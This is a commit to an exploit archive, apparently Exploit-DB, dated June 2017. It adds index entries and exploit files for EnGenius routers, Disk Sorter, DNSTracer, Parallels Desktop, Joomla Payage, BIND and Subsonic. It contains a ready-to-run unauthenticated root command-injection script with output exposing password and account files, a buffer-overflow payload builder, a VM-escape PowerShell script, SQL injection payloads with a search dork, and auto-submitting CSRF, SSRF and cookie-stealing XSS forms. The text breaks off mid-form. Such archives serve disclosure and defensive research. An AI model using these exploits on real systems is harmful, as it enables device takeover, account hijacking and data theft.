DB: 2017-06-06

11 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow DNSTracer 1.8.1 - Buffer Overflow Parallels Desktop - Virtual Machine Escape Subsonic 6.1.1 - XML External Entity Injection BIND 9.10.5 - Unquoted Service Path Privilege Escalation Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution Subsonic 6.1.1 - Cross-Site Request Forgery Subsonic 6.1.1 - Server-Side Request Forgery Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
2017-06-06 05:01:15 +00:00 · 2017-06-06 05:01:15 +00:00 · cd6e21e600
commit cd6e21e600
parent 42e94b4366
12 changed files with 813 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5526,6 +5526,8 @@ id,file,description,date,author,platform,type,port
 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
 42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9024,6 +9026,9 @@ id,file,description,date,author,platform,type,port
 42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
 42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0
 42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0
 42116,platforms/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local,0
 42119,platforms/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local,0
 42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15528,7 +15533,7 @@ id,file,description,date,author,platform,type,port
 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
 41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
-41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0
+42122,platforms/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
 41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000
 41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0
 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
@ -37942,3 +37947,8 @@ id,file,description,date,author,platform,type,port
 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
 42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
 42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
 42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
 42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
--- a/platforms/hardware/remote/42122.py
+++ b/platforms/hardware/remote/42122.py
--- a/platforms/hardware/webapps/42114.py
+++ b/platforms/hardware/webapps/42114.py
@ -0,0 +1,127 @@
 #!/usr/bin/env python
 # coding: utf8
 #
 #
 # EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
 #
 #
 # Vendor: EnGenius Technologies Inc.
 # Product web page: https://www.engeniustech.com
 # Affected version: ESR300  (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
 #                   ESR350  (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
 #                   ESR600  (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
 #                   EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
 #                   ESR900  (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
 #                   ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
 #                   ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
 #
 # Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
 # your iPhone, iPad or Android-based tablet or smartphone to transfer
 # video, music and other files to and from a router-attached USB hard
 # drive. Enshare is a USB media storage sharing application that enables
 # access to files remotely. The EnShare feature allows you to access media
 # content stored on a USB hard drive connected to the router's USB port in
 # the home and when you are away from home when you have access to the Internet.
 # By default the EnShare feature is enabled.
 #
 # EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
 # from your router-attached USB storage device to a remote/mobile device may
 # vary based on Internet uplink and downlink speeds. The router's design enables
 # users to connect numerous wired and wireless devices to it and supports intensive
 # applications like streaming HD video and sharing of media in the home and accessing
 # media away from the home with EnShare - Your Personal Media Cloud.
 #
 # Desc: EnGenius EnShare suffers from an unauthenticated command injection
 # vulnerability. An attacker can inject and execute arbitrary code as the
 # root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
 # script.
 #
 # =======================================================================
 #
 # bash-4.4$ python enshare.py 10.0.0.17
 # [+] Command: ls -alsh
 #   44 -rwxr-xr-x    1 0        0           42.5K Oct 31  2014 getsize.cgi
 #    4 -rwxr-xr-x    1 0        0             606 Oct 31  2014 languageinfo.cgi
 #   48 -rwxr-xr-x    1 0        0           44.2K Oct 31  2014 upload.cgi
 #   48 -rwxr-xr-x    1 0        0           44.5K Oct 31  2014 usbinfo.cgi
 #   56 -rwxr-xr-x    1 0        0           54.1K Oct 31  2014 usbinteract.cgi
 #    0 drwxr-xr-x    4 0        0               0 Jun  3 00:52 ..
 #    0 drwxr-xr-x    2 0        0               0 Oct 31  2014 .
 #
 # [+] Command: id
 # uid=0(root) gid=0(root)
 #
 # [+] Command: cat /etc/passwd
 #
 # Connecting to 10.0.0.17 port 9000
 #
 # HTTP/1.1 200 OK
 # root: !:0:0:root:/root:/bin/sh
 # administrator: *:65534:65534:administrator:/var:/bin/false
 # admin: *:60000:60000:webaccount:/home:/usr/bin/sh
 # guest: *:60001:60000:webaccount:/home:/usr/bin/sh
 # Content-type: text/html
 # Transfer-Encoding: chunked
 # Date: Sat, 03 Jun 2017 13:48:14 GMT
 # Server: lighttpd/1.4.31
 #
 # 0
 # [+] Command: pwd
 # /www/web/cgi-bin
 # [+] Command: cat /etc/account.conf
 #
 # HTTP/1.1 200 OK
 # 1: admin:admin:4
 # 1: guest:guest:1
 # Content-type: text/html
 # Transfer-Encoding: chunked
 # Date: Sat, 03 Jun 2017 14:53:42 GMT
 # Server: lighttpd/1.4.31
 # bash-4.4$ 
 #
 # =======================================================================
 #
 # Tested on: Linux 2.6.36 (mips)
 #            Embedded HTTP Server ,Firmware Version 5.11
 #            lighttpd/1.4.31
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5413
 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
 #
 #
 # 17.05.2017
 #
 import sys, socket
 if len(sys.argv) < 2:
    print 'Usage: enshare.py <ip> [port]\n'
    quit()
 ip = sys.argv[1]
 port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
 cmd = raw_input('[+] Command: ')
 payload  = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
 payload += 'Host: {0}:{1}\r\n'
 payload += 'Content-Length: {2}\r\n'
 payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
 payload += 'action=7&path=\"|{3}||\"'
 msg = payload.format( ip, port, len(cmd)+19, cmd )
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 target = (ip, port)
 print >>sys.stderr, '\nConnecting to %s port %s\n' % target
 s.connect(target)
 s.sendall(msg)
 response = s.recv(5000)
 s.close()
 print response.strip()
--- a/platforms/linux/dos/42115.txt
+++ b/platforms/linux/dos/42115.txt
@ -0,0 +1,73 @@
 ################
 #Exploit Title: DNSTracer Stack-based Buffer Overflow
 #CVE: CVE-2017-9430
 #CWE: CWE-119
 #Exploit Author: Hosein Askari (FarazPajohan)
 #Vendor HomePage: http://www.mavetju.org
 #Version : 1.8.1
 #Tested on: Parrot OS
 #Date: 04-06-2017
 #Category: Application
 #Author Mail : hosein.askari@aol.com
 #Description:  Stack-based buffer overflow in dnstracer through 1.9 allows =
 attackers  to cause a denial of service (application crash) or possibly hav=
 e unspecified other impact via a command line with a long name argument tha=
 t is mishandled in a strcpy call for argv[0]. An example threat model is a =
 web application that launches dnstracer with an untrusted name string.
 ###############################
 #dnstracer -v $(python -c 'print "A"*1025')
 *** buffer overflow detected ***: dnstracer terminated
 =3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
 /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
 /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
 /lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
 /lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
 dnstracer(+0x2c8f)[0x5634368aac8f]
 /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
 dnstracer(+0x2fca)[0x5634368aafca]
 =3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
 5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311                    /u=
 sr/bin/dnstracer
 563436aaf000-563436ab0000 r--p 00007000 08:01 4850311                    /u=
 sr/bin/dnstracer
 563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311                    /u=
 sr/bin/dnstracer
 563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
 563436c1d000-563436c3e000 rw-p 00000000 00:00 0                          [h=
 eap]
 7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192                   /l=
 ib/x86_64-linux-gnu/libgcc_s.so.1
 7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192                   /l=
 ib/x86_64-linux-gnu/libgcc_s.so.1
 7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192                   /l=
 ib/x86_64-linux-gnu/libgcc_s.so.1
 7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192                   /l=
 ib/x86_64-linux-gnu/libgcc_s.so.1
 7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976                   /l=
 ib/x86_64-linux-gnu/libc-2.24.so
 7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976                   /l=
 ib/x86_64-linux-gnu/libc-2.24.so
 7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976                   /l=
 ib/x86_64-linux-gnu/libc-2.24.so
 7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976                   /l=
 ib/x86_64-linux-gnu/libc-2.24.so
 7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
 7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455                   /l=
 ib/x86_64-linux-gnu/ld-2.24.so
 7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
 7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
 7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455                   /l=
 ib/x86_64-linux-gnu/ld-2.24.so
 7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455                   /l=
 ib/x86_64-linux-gnu/ld-2.24.so
 7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
 7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0                          [s=
 tack]
 7ffded767000-7ffded769000 r--p 00000000 00:00 0                          [v=
 var]
 7ffded769000-7ffded76b000 r-xp 00000000 00:00 0                          [v=
 dso]
 ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [v=
 syscall]
 Aborted
--- a/platforms/php/webapps/42113.txt
+++ b/platforms/php/webapps/42113.txt
@ -0,0 +1,27 @@
 # Exploit Title: Joomla Payage 2.05 - SQL Injection
 # Exploit Author: Persian Hack Team
 # Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
 # Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
 # My Home : http://persian-team.ir/
 # Google Dork : inurl:index.php?option=com_payage
 # Telegram Channel: @PersianHackTeam
 # Tested on: Linux
 # Date: 2017-06-03
 # POC :
 # SQL Injection : 
 Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
 ---
 http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
 # Greetz : T3NZOG4N & FireKernel
 # Iranian White Hat Hackers
--- a/platforms/windows/dos/42112.py
+++ b/platforms/windows/dos/42112.py
@ -0,0 +1,27 @@
 #!/usr/bin/python
 ######################################
 #	Exploit Title:		DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
 # 	Date: 				25 May 2017
 # 	Exploit Author: 	n3ckD_
 #	Vendor Homepage:	http://www.disksorter.com/
 #	Software Link:		http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
 #	Version:			Disk Sorter v9.7.14 (32-Bit)
 #	Tested on:			Windows 7 Enterprise SP1 (Build 7601)
 #	Usage:				Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
 ######################################
 print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
 print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
 # in libspg:.text
 # 10147C1C   58               POP EAX
 # 10147C1D   C3               RETN
 ret = "\x1c\x7c\x14\x10"
 nops = "\x47\x4F"*24
 buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
 f = open("poc.txt","w")
 f.write(buf)
 f.close()
--- a/platforms/windows/local/42116.txt
+++ b/platforms/windows/local/42116.txt
@ -0,0 +1,57 @@
 #[+] Title:  Parallels Desktop - Virtual Machine Escape
 #[+] Product: Parallels
 #[+] Vendor: http://www.parallels.com/products/desktop/
 #[+] Affected Versions: All Version
 #
 #
 # Author      :   Mohammad Reza Espargham
 # Linkedin    :   https://ir.linkedin.com/in/rezasp
 # E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
 # Website     :   www.reza.es
 # Twitter     :   https://twitter.com/rezesp
 # FaceBook    :   https://www.facebook.com/reza.espargham
 # Github : github.com/rezasp
 # youtube : https://youtu.be/_nZ4y0ZTrwA
 #
 #
 #There is a security issue in the shared folder implementation in Parallels Desktop
 #DLL : PrlToolsShellExt.dll  10.2.0 (28956)
 #prl_tg Driver
 #Very simple exploit with powershell
 #powershell.exe poc.ps1
 #Write OSX Executable file in temp
 [io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
 add-type -AssemblyName microsoft.VisualBasic
 add-type -AssemblyName System.Windows.Forms
 #open temp in explorer
 explorer $env:temp
 #wait for 500 miliseconds
 start-sleep -Milliseconds 500
 #select Temp active window
 [Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
 #find r3z4.command file
 [System.Windows.Forms.SendKeys]::SendWait("r3z4")
 #right click
 [System.Windows.Forms.SendKeys]::SendWait("+({F10})")
 #goto "Open on Mac" in menu
 [System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
 [System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
 [System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
 #Click Enter
 [System.Windows.Forms.SendKeys]::SendWait("~")
 #Enjoy ;)s
--- a/platforms/windows/local/42119.txt
+++ b/platforms/windows/local/42119.txt
@ -0,0 +1,102 @@
 [+] Credits: John Page a.k.a hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ================
 www.subsonic.org
 Product:
 ===============
 subsonic v6.1.1
 Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 Vulnerability Type:
 ====================
 XML External Entity 
 CVE Reference:
 ==============
 CVE-2017-9355
 Security Issue:
 ================
 subsonic import playlist feature is succeptible to XML External Entity attack. To exploit a User must be tricked to
 import a malicious .XSPF playlist file. The XXE injection can be used to target various hosts from the internal network 
 to bypass Firewall or from the internet as XML External Entity is related to Server Side Request Forgery (SSRF) attacks.
 Exploit/POC:
 =============
 1) Create some playlist file "RainbowsNUnic0rns.xspf" 
 <?xml version="1.0"?>
 <!DOCTYPE mmmmmRaisins [ 
 <!ENTITY % mmmm SYSTEM "http://127.0.0.1:1337/">
 %mmmm;]>
 2) Import as playlist.
 3) Start listener.
 nc.exe -llvp 1337
 listening on [any] 1337 ...
 connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
 GET / HTTP/1.1
 Cache-Control: no-cache
 Pragma: no-cache
 User-Agent: Java/1.8.0_45
 Host: 127.0.0.1:1337
 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
 Connection: keep-alive
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 ==================================
 Vendor Notification:  May 29, 2017
 Vendor Acknowledgement: May 30, 2017
 June 4, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/platforms/windows/local/42121.txt
+++ b/platforms/windows/local/42121.txt
@ -0,0 +1,90 @@
 [+] Credits: John Page aka hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ===========
 www.isc.org
 Product:
 ===========
 BIND9
 v9.10.5 x86 / x64
 BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
 queries for your users.  The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
 at the University of California at Berkeley.
 Vulnerability Type:
 ===================
 Privilege Escalation
 CVE Reference:
 ==============
 CVE-2017-3141
 Security Issue:
 ================
 BIND installs as a service with an unquoted service path, to exploit a local attacker must place 
 a malicious executable file named "Program.exe" in the path of the service, if the process runs under
 some account other than the attackers it can be used to exec code under a different set of privileges.
 C:\>sc qc named
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: named
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ISC BIND 9\bin\named.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ISC BIND
        DEPENDENCIES       :
        SERVICE_START_NAME : .\named
 Network Access:
 ===============
 Local
 Severity:
 =========
 Medium
 Disclosure Timeline:
 ==================================
 Vendor Notification:  May 13, 2017
 Vendor confirm: May 14, 2017
 June 4, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
--- a/platforms/windows/webapps/42117.txt
+++ b/platforms/windows/webapps/42117.txt
@ -0,0 +1,86 @@
 [+] Credits: John Page a.k.a hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ================
 www.subsonic.org
 Product:
 ===============
 subsonic v6.1.1
 Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 Vulnerability Type:
 =====================
 CSRF - Password Reset
 CVE Reference:
 ==============
 CVE-2017-9415
 Security Issue:
 ================
 Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
 or visits an attacker controlled webpage. However, username must be known or guessed.
 Exploit/POC:
 =============
 <form  action="http://localhost:4040/userSettings.view" method="POST">
 <input type="hidden" name="username"  value="admin">
 <input type="hidden" name="transcodeSchemeName" value="OFF">
 <input name="passwordChange" type="hidden" value="true"/>
 <input type="hidden" name="_passwordChange" value="on"/>
 <input  name="password" type="hidden" value="xyz123"/>
 <input  name="confirmPassword" type="hidden" value="xyz123"/>
 <input  name="email" type="hidden" value=""/>
 <script>document.forms[0].submit()</script>
 </form>
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 =============================
 Vendor Notification:  May 29, 2017
 Vendor Acknowledgement: May 30, 2017
 June 4, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/platforms/windows/webapps/42118.txt
+++ b/platforms/windows/webapps/42118.txt
@ -0,0 +1,117 @@
 [+] Credits: John Page a.k.a hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ================
 www.subsonic.org
 Product:
 ===============
 subsonic v6.1.1
 Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 Vulnerability Type:
 ==================================
 CSRF - Server Side Request Forgery
 CVE Reference:
 ==============
 CVE-2017-9413
 Security Issue:
 ================
 Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network 
 or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
 bypass Firewall restriction on LAN.
 e.g
 nc.exe -llvp 1337
 listening on [any] 1337 ...
 connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
 GET / HTTP/1.1
 Cache-Control: no-cache
 Pragma: no-cache
 User-Agent: Java/1.8.0_45
 Host: 127.0.0.1:1337
 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
 Connection: keep-alive
 Exploit/POC:
 =============
 nc.exe -llvp 1337
 listening on [any] 1337 ...
 1) Subscribe to Podcast CSRF Persistent SSRF
 <form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
 <input type="text" name="add" value="http://127.0.0.1:1337">
 <input type="submit" value="OK">
 <script>document.forms[0].submit()</script>
 </form>
 nc.exe -llvp 5555
 listening on [any] 5555 ...
 2) Interet Radio Settings CSRF Persistent SSRF
 <form  action="http://localhost:4040/networkSettings.view" method="post">
 <input name="portForwardingEnabled" type="hidden" value="true"/>
 <input type="hidden" name="_portForwardingEnabled" value="on"/>
 <input  name="urlRedirectionEnabled" type="hidden" value="true" />
 <input type="hidden" name="_urlRedirectionEnabled" value="on"/>
 <input  name="urlRedirectType" type="radio" value="NORMAL"/>
 <input  name="urlRedirectFrom" type="radio" value="yourname"/>
 <input  name="urlRedirectType"  type="radio" value="CUSTOM" checked="true" />
 <input  name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
 <script>document.forms[0].submit()</script>
 </form> 
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 ==================================
 Vendor Notification:  May 29, 2017
 Vendor Acknowledgement: May 30, 2017
 June 4, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/platforms/windows/webapps/42120.txt
+++ b/platforms/windows/webapps/42120.txt
@ -0,0 +1,96 @@
 [+] Credits: John Page a.k.a hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ================
 www.subsonic.org
 Product:
 ===============
 subsonic v6.1.1
 Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 Vulnerability Type:
 ======================
 CSRF - Persistent XSS
 CVE Reference:
 ==============
 CVE-2017-9414
 Security Issue:
 ================
 Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads 
 if an authenticated user clicks a malicious link or visits an attacker controlled webpage. 
 Exploit/POC:
 =============
 <form action="http://localhost:4040/playerSettings.view" method="post">
 <input name="playerId" type="hidden" value="1">
 <input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
